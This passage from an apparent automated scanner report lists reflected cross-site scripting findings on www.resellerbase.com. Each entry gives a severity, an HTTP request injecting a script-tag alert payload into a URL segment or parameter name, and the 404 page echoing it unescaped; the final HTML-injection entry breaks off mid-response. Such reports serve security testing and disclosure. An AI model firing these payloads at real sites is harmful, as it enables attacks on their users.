GET /detail/19/themes/kosmos/images82e88<script>alert(1)</script>5f04879472/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images82e88<script>alert(1)</script>5f04879472/rating/ was not found on this server.</p>
...[SNIP]...

2.1601. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/ [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 86979<script>alert(1)</script>d24b49446ae was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/rating86979<script>alert(1)</script>d24b49446ae/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating86979<script>alert(1)</script>d24b49446ae/ was not found on this server.</p>
...[SNIP]...

2.1602. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 57024<script>alert(1)</script>9015b1dc334 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/rating/?57024<script>alert(1)</script>9015b1dc334=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating/?57024<script>alert(1)</script>9015b1dc334=1 was not found on this server.</p>
...[SNIP]...

2.1603. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 839b9<script>alert(1)</script>7ec92a08fa8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail839b9<script>alert(1)</script>7ec92a08fa8/19/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail839b9<script>alert(1)</script>7ec92a08fa8/19/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1604. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload cbea6<script>alert(1)</script>02109f221c9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19cbea6<script>alert(1)</script>02109f221c9/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19cbea6<script>alert(1)</script>02109f221c9/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1605. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 3578d<script>alert(1)</script>37dc2996d11 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes3578d<script>alert(1)</script>37dc2996d11/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes3578d<script>alert(1)</script>37dc2996d11/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1606. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c01f7<script>alert(1)</script>488a8c30ff2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmosc01f7<script>alert(1)</script>488a8c30ff2/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmosc01f7<script>alert(1)</script>488a8c30ff2/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1607. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ddb88<script>alert(1)</script>fafcc471c1f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/imagesddb88<script>alert(1)</script>fafcc471c1f/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:35:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/imagesddb88<script>alert(1)</script>fafcc471c1f/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.1608. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 953e3<script>alert(1)</script>82a4b23cd4b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/rating953e3<script>alert(1)</script>82a4b23cd4b/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating953e3<script>alert(1)</script>82a4b23cd4b/0.gif was not found on this server.</p>
...[SNIP]...

2.1609. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload d7a2c<script>alert(1)</script>980d5cb557f was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/rating/0.gifd7a2c<script>alert(1)</script>980d5cb557f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:36:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating/0.gifd7a2c<script>alert(1)</script>980d5cb557f was not found on this server.</p>
...[SNIP]...

2.1610. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 84ca7<script>alert(1)</script>6f755c30ea0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/rating/0.gif?84ca7<script>alert(1)</script>6f755c30ea0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:34:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating/0.gif?84ca7<script>alert(1)</script>6f755c30ea0=1 was not found on this server.</p>
...[SNIP]...

2.1611. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9a802<script>alert(1)</script>9c38f5e0718 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9a802<script>alert(1)</script>9c38f5e0718/19/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:14:57 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9a802<script>alert(1)</script>9c38f5e0718/19/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1612. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload def51<script>alert(1)</script>760a833f071 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19def51<script>alert(1)</script>760a833f071/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19def51<script>alert(1)</script>760a833f071/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1613. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 70ffb<script>alert(1)</script>19dc54cc2eb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes70ffb<script>alert(1)</script>19dc54cc2eb/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes70ffb<script>alert(1)</script>19dc54cc2eb/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1614. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 1e4f7<script>alert(1)</script>bbdc6d22208 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos1e4f7<script>alert(1)</script>bbdc6d22208/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos1e4f7<script>alert(1)</script>bbdc6d22208/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1615. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 97f96<script>alert(1)</script>2d366d96b5d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images97f96<script>alert(1)</script>2d366d96b5d/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images97f96<script>alert(1)</script>2d366d96b5d/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1616. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 299e7<script>alert(1)</script>8c17a4aa36b was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/rating299e7<script>alert(1)</script>8c17a4aa36b/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating299e7<script>alert(1)</script>8c17a4aa36b/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1617. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4b22d<script>alert(1)</script>5e6e863dc43 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/19/themes/kosmos/images/rating/search.php4b22d<script>alert(1)</script>5e6e863dc43?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:21 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/19/themes/kosmos/images/rating/search.php4b22d<script>alert(1)</script>5e6e863dc43?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.1618. http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/19/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload d7eb5<a>4959c98ce31 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/19/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchd7eb5<a>4959c98ce31&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/19/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
